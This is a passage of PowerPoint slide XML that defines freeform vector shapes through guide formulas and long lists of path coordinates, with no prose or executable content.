                  <a:gd name="T100" fmla="*/ 294 w 609"/>
                  <a:gd name="T101" fmla="*/ 463 h 611"/>
                  <a:gd name="T102" fmla="*/ 314 w 609"/>
                  <a:gd name="T103" fmla="*/ 478 h 611"/>
                  <a:gd name="T104" fmla="*/ 341 w 609"/>
                  <a:gd name="T105" fmla="*/ 483 h 611"/>
                  <a:gd name="T106" fmla="*/ 362 w 609"/>
                  <a:gd name="T107" fmla="*/ 473 h 611"/>
                  <a:gd name="T108" fmla="*/ 388 w 609"/>
                  <a:gd name="T109" fmla="*/ 452 h 611"/>
                  <a:gd name="T110" fmla="*/ 398 w 609"/>
                  <a:gd name="T111" fmla="*/ 420 h 611"/>
                  <a:gd name="T112" fmla="*/ 404 w 609"/>
                  <a:gd name="T113" fmla="*/ 405 h 611"/>
                  <a:gd name="T114" fmla="*/ 404 w 609"/>
                  <a:gd name="T115" fmla="*/ 389 h 611"/>
                  <a:gd name="T116" fmla="*/ 388 w 609"/>
                  <a:gd name="T117" fmla="*/ 352 h 611"/>
                  <a:gd name="T118" fmla="*/ 320 w 609"/>
                  <a:gd name="T119" fmla="*/ 258 h 6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09" h="611">
                    <a:moveTo>
                      <a:pt x="37" y="310"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="310"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="309" y="294"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="309" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="294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8" name="Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6584950" y="5710238"/>
                <a:ext cx="166688" cy="227012"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 105 w 463"/>
                  <a:gd name="T1" fmla="*/ 110 h 631"/>
                  <a:gd name="T2" fmla="*/ 153 w 463"/>
                  <a:gd name="T3" fmla="*/ 168 h 631"/>
                  <a:gd name="T4" fmla="*/ 158 w 463"/>
                  <a:gd name="T5" fmla="*/ 168 h 631"/>
                  <a:gd name="T6" fmla="*/ 158 w 463"/>
                  <a:gd name="T7" fmla="*/ 168 h 631"/>
                  <a:gd name="T8" fmla="*/ 153 w 463"/>
                  <a:gd name="T9" fmla="*/ 120 h 631"/>
                  <a:gd name="T10" fmla="*/ 158 w 463"/>
                  <a:gd name="T11" fmla="*/ 84 h 631"/>
                  <a:gd name="T12" fmla="*/ 158 w 463"/>
                  <a:gd name="T13" fmla="*/ 84 h 631"/>
                  <a:gd name="T14" fmla="*/ 163 w 463"/>
                  <a:gd name="T15" fmla="*/ 62 h 631"/>
                  <a:gd name="T16" fmla="*/ 174 w 463"/>
                  <a:gd name="T17" fmla="*/ 47 h 631"/>
                  <a:gd name="T18" fmla="*/ 184 w 463"/>
                  <a:gd name="T19" fmla="*/ 32 h 631"/>
                  <a:gd name="T20" fmla="*/ 200 w 463"/>
                  <a:gd name="T21" fmla="*/ 15 h 631"/>
                  <a:gd name="T22" fmla="*/ 200 w 463"/>
                  <a:gd name="T23" fmla="*/ 15 h 631"/>
                  <a:gd name="T24" fmla="*/ 210 w 463"/>
                  <a:gd name="T25" fmla="*/ 10 h 631"/>
                  <a:gd name="T26" fmla="*/ 210 w 463"/>
                  <a:gd name="T27" fmla="*/ 10 h 631"/>
                  <a:gd name="T28" fmla="*/ 221 w 463"/>
                  <a:gd name="T29" fmla="*/ 0 h 631"/>
                  <a:gd name="T30" fmla="*/ 310 w 463"/>
                  <a:gd name="T31" fmla="*/ 110 h 631"/>
                  <a:gd name="T32" fmla="*/ 310 w 463"/>
                  <a:gd name="T33" fmla="*/ 110 h 631"/>
                  <a:gd name="T34" fmla="*/ 289 w 463"/>
                  <a:gd name="T35" fmla="*/ 120 h 631"/>
                  <a:gd name="T36" fmla="*/ 289 w 463"/>
                  <a:gd name="T37" fmla="*/ 120 h 631"/>
                  <a:gd name="T38" fmla="*/ 273 w 463"/>
                  <a:gd name="T39" fmla="*/ 136 h 631"/>
                  <a:gd name="T40" fmla="*/ 273 w 463"/>
                  <a:gd name="T41" fmla="*/ 136 h 631"/>
                  <a:gd name="T42" fmla="*/ 247 w 463"/>
                  <a:gd name="T43" fmla="*/ 162 h 631"/>
                  <a:gd name="T44" fmla="*/ 247 w 463"/>
                  <a:gd name="T45" fmla="*/ 162 h 631"/>
                  <a:gd name="T46" fmla="*/ 237 w 463"/>
                  <a:gd name="T47" fmla="*/ 179 h 631"/>
                  <a:gd name="T48" fmla="*/ 231 w 463"/>
                  <a:gd name="T49" fmla="*/ 199 h 631"/>
                  <a:gd name="T50" fmla="*/ 231 w 463"/>
                  <a:gd name="T51" fmla="*/ 199 h 631"/>
                  <a:gd name="T52" fmla="*/ 226 w 463"/>
                  <a:gd name="T53" fmla="*/ 215 h 631"/>
                  <a:gd name="T54" fmla="*/ 231 w 463"/>
                  <a:gd name="T55" fmla="*/ 236 h 631"/>
                  <a:gd name="T56" fmla="*/ 231 w 463"/>
                  <a:gd name="T57" fmla="*/ 236 h 631"/>
                  <a:gd name="T58" fmla="*/ 237 w 463"/>
                  <a:gd name="T59" fmla="*/ 257 h 631"/>
                  <a:gd name="T60" fmla="*/ 252 w 463"/>
                  <a:gd name="T61" fmla="*/ 278 h 631"/>
                  <a:gd name="T62" fmla="*/ 462 w 463"/>
                  <a:gd name="T63" fmla="*/ 540 h 631"/>
                  <a:gd name="T64" fmla="*/ 347 w 463"/>
                  <a:gd name="T65" fmla="*/ 630 h 631"/>
                  <a:gd name="T66" fmla="*/ 0 w 463"/>
                  <a:gd name="T67" fmla="*/ 194 h 631"/>
                  <a:gd name="T68" fmla="*/ 105 w 463"/>
                  <a:gd name="T69" fmla="*/ 110 h 6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63" h="631">
                    <a:moveTo>
                      <a:pt x="105" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="153" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="11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9" name="Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6697663" y="5632450"/>
                <a:ext cx="196850" cy="204788"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 263 w 547"/>
                  <a:gd name="T1" fmla="*/ 383 h 568"/>
                  <a:gd name="T2" fmla="*/ 299 w 547"/>
                  <a:gd name="T3" fmla="*/ 414 h 568"/>
                  <a:gd name="T4" fmla="*/ 336 w 547"/>
                  <a:gd name="T5" fmla="*/ 435 h 568"/>
                  <a:gd name="T6" fmla="*/ 373 w 547"/>
                  <a:gd name="T7" fmla="*/ 446 h 568"/>
                  <a:gd name="T8" fmla="*/ 389 w 547"/>
                  <a:gd name="T9" fmla="*/ 441 h 568"/>
                  <a:gd name="T10" fmla="*/ 404 w 547"/>
                  <a:gd name="T11" fmla="*/ 430 h 568"/>
                  <a:gd name="T12" fmla="*/ 426 w 547"/>
                  <a:gd name="T13" fmla="*/ 404 h 568"/>
                  <a:gd name="T14" fmla="*/ 426 w 547"/>
                  <a:gd name="T15" fmla="*/ 377 h 568"/>
                  <a:gd name="T16" fmla="*/ 415 w 547"/>
                  <a:gd name="T17" fmla="*/ 341 h 568"/>
                  <a:gd name="T18" fmla="*/ 489 w 547"/>
                  <a:gd name="T19" fmla="*/ 215 h 568"/>
                  <a:gd name="T20" fmla="*/ 515 w 547"/>
                  <a:gd name="T21" fmla="*/ 251 h 568"/>
                  <a:gd name="T22" fmla="*/ 546 w 547"/>
                  <a:gd name="T23" fmla="*/ 325 h 568"/>
                  <a:gd name="T24" fmla="*/ 546 w 547"/>
                  <a:gd name="T25" fmla="*/ 362 h 568"/>
                  <a:gd name="T26" fmla="*/ 525 w 547"/>
                  <a:gd name="T27" fmla="*/ 430 h 568"/>
                  <a:gd name="T28" fmla="*/ 467 w 547"/>
                  <a:gd name="T29" fmla="*/ 498 h 568"/>
                  <a:gd name="T30" fmla="*/ 441 w 547"/>
                  <a:gd name="T31" fmla="*/ 524 h 568"/>
                  <a:gd name="T32" fmla="*/ 389 w 547"/>
                  <a:gd name="T33" fmla="*/ 556 h 568"/>
                  <a:gd name="T34" fmla="*/ 363 w 547"/>
                  <a:gd name="T35" fmla="*/ 561 h 568"/>
                  <a:gd name="T36" fmla="*/ 310 w 547"/>
                  <a:gd name="T37" fmla="*/ 567 h 568"/>
                  <a:gd name="T38" fmla="*/ 268 w 547"/>
                  <a:gd name="T39" fmla="*/ 551 h 568"/>
                  <a:gd name="T40" fmla="*/ 226 w 547"/>
                  <a:gd name="T41" fmla="*/ 530 h 568"/>
                  <a:gd name="T42" fmla="*/ 184 w 547"/>
                  <a:gd name="T43" fmla="*/ 498 h 568"/>
                  <a:gd name="T44" fmla="*/ 110 w 547"/>
                  <a:gd name="T45" fmla="*/ 424 h 568"/>
                  <a:gd name="T46" fmla="*/ 42 w 547"/>
                  <a:gd name="T47" fmla="*/ 335 h 568"/>
                  <a:gd name="T48" fmla="*/ 21 w 547"/>
                  <a:gd name="T49" fmla="*/ 294 h 568"/>
                  <a:gd name="T50" fmla="*/ 6 w 547"/>
                  <a:gd name="T51" fmla="*/ 247 h 568"/>
                  <a:gd name="T52" fmla="*/ 0 w 547"/>
                  <a:gd name="T53" fmla="*/ 199 h 568"/>
                  <a:gd name="T54" fmla="*/ 11 w 547"/>
                  <a:gd name="T55" fmla="*/ 152 h 568"/>
                  <a:gd name="T56" fmla="*/ 21 w 547"/>
                  <a:gd name="T57" fmla="*/ 130 h 568"/>
                  <a:gd name="T58" fmla="*/ 58 w 547"/>
                  <a:gd name="T59" fmla="*/ 83 h 568"/>
                  <a:gd name="T60" fmla="*/ 84 w 547"/>
                  <a:gd name="T61" fmla="*/ 57 h 568"/>
                  <a:gd name="T62" fmla="*/ 152 w 547"/>
                  <a:gd name="T63" fmla="*/ 15 h 568"/>
                  <a:gd name="T64" fmla="*/ 173 w 547"/>
                  <a:gd name="T65" fmla="*/ 5 h 568"/>
                  <a:gd name="T66" fmla="*/ 257 w 547"/>
                  <a:gd name="T67" fmla="*/ 5 h 568"/>
                  <a:gd name="T68" fmla="*/ 299 w 547"/>
                  <a:gd name="T69" fmla="*/ 26 h 568"/>
                  <a:gd name="T70" fmla="*/ 342 w 547"/>
                  <a:gd name="T71" fmla="*/ 52 h 568"/>
                  <a:gd name="T72" fmla="*/ 426 w 547"/>
                  <a:gd name="T73" fmla="*/ 136 h 568"/>
                  <a:gd name="T74" fmla="*/ 236 w 547"/>
                  <a:gd name="T75" fmla="*/ 346 h 568"/>
                  <a:gd name="T76" fmla="*/ 247 w 547"/>
                  <a:gd name="T77" fmla="*/ 147 h 568"/>
                  <a:gd name="T78" fmla="*/ 231 w 547"/>
                  <a:gd name="T79" fmla="*/ 130 h 568"/>
                  <a:gd name="T80" fmla="*/ 210 w 547"/>
                  <a:gd name="T81" fmla="*/ 120 h 568"/>
                  <a:gd name="T82" fmla="*/ 179 w 547"/>
                  <a:gd name="T83" fmla="*/ 120 h 568"/>
                  <a:gd name="T84" fmla="*/ 163 w 547"/>
                  <a:gd name="T85" fmla="*/ 126 h 568"/>
                  <a:gd name="T86" fmla="*/ 147 w 547"/>
                  <a:gd name="T87" fmla="*/ 136 h 568"/>
                  <a:gd name="T88" fmla="*/ 126 w 547"/>
                  <a:gd name="T89" fmla="*/ 167 h 568"/>
                  <a:gd name="T90" fmla="*/ 121 w 547"/>
                  <a:gd name="T91" fmla="*/ 183 h 568"/>
                  <a:gd name="T92" fmla="*/ 126 w 547"/>
                  <a:gd name="T93" fmla="*/ 199 h 568"/>
                  <a:gd name="T94" fmla="*/ 142 w 547"/>
                  <a:gd name="T95" fmla="*/ 236 h 568"/>
                  <a:gd name="T96" fmla="*/ 179 w 547"/>
                  <a:gd name="T97" fmla="*/ 283 h 568"/>
                  <a:gd name="T98" fmla="*/ 289 w 547"/>
                  <a:gd name="T99" fmla="*/ 188 h 5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47" h="568">
                    <a:moveTo>
                      <a:pt x="263" y="383"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="52"/>
